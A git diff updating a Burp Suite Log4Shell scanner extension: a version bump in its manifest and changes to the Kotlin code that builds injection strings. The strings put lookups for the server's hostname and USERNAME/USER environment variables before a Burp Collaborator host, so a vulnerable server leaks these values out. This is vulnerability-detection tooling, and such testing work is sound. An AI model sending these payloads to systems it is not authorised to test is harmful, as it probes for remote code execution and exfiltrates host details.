Merge https://github.com/PortSwigger/log4shell-scanner

BappManifest.bmf

@@ -2,8 +2,8 @@ Uuid: b011be53649346dd87276bca41ce8e8f
 ExtensionType: 1
 Name: Log4Shell Scanner
 RepoName: log4shell-scanner
-ScreenVersion: 0.2.2
-SerialVersion: 3
+ScreenVersion: 0.2.3
+SerialVersion: 5
 MinPlatformVersion: 0
 ProOnly: True
 Author: SilentSignal

src/main/kotlin/burp/BurpExtender.kt

@@ -25,6 +25,7 @@ import java.util.*
 import java.util.concurrent.ConcurrentHashMap
 
 const val NAME = "Log4Shell scanner"
+const val QUERY_NOTHING = 'q'
 const val QUERY_HOSTNAME = 'h'
 const val QUERY_HOSTUSER = 'u'
 
@@ -76,9 +77,10 @@ class BurpExtender : IBurpExtender, IScannerCheck, IExtensionStateListener {
     override fun doActiveScan(baseRequestResponse: IHttpRequestResponse?, insertionPoint: IScannerInsertionPoint?): MutableList<IScanIssue> {
         val context = mutableListOf<Pair<IHttpRequestResponse, IntArray>>()
         val collabResults = mutableListOf<IBurpCollaboratorInteraction>()
-        for ((prefix, key) in listOf(Pair(QUERY_HOSTNAME, "hostName"), Pair(QUERY_HOSTUSER, "hostName}-s2u-\${env:USERNAME:-\${env:USER}"))) {
+        for ((prefix, key) in listOf(Pair(QUERY_NOTHING, null), Pair(QUERY_HOSTNAME, "hostName"), Pair(QUERY_HOSTUSER, "hostName}-s2u-\${env:USERNAME:-\${env:USER}"))) {
             val payload = collaborator.generatePayload(false)
-            val bytes = "$staticPrefix$prefix\${$key}.$payload.${collaborator.collaboratorServerLocation}/s2test}".toByteArray()
+            val keyLookup = if (key == null) "" else "\${$key}"
+            val bytes = "$staticPrefix${prefix}${keyLookup}.$payload.${collaborator.collaboratorServerLocation}:99999/s2test}".toByteArray()
             val request = insertionPoint!!.buildRequest(bytes)
             val poff = insertionPoint.getPayloadOffsets(bytes)
             val hs = baseRequestResponse!!.httpService